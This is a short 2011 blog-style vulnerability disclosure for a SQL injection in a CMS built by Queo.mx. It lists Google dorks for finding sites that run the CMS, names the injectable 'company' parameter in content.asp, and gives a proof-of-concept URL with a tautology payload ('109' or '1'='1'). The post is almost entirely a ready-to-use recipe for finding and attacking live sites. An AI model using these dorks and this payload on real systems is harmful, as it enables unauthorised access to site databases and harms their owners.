Tuesday, March 1, 2011

CMS Powered By Queo.mx Vulnerable to SQL Injection


Title : CMS Powered By Queo.mx Vulnerable to SQL Injection
Web : http://queo.com.mx/ :
Found By: p0pc0rn 01/03/2011
Dork
: intext:"Queo.com.mx" filetype:asp
: inurl:"cms/content.asp?company="


SQL
---

http://site.com/cms/content.asp?company=[SQL]

POC
---

http://site.com/cms/content.asp?company=109' or '1'='1



thanks,
-p0pc0rn-
Share:

0 comments: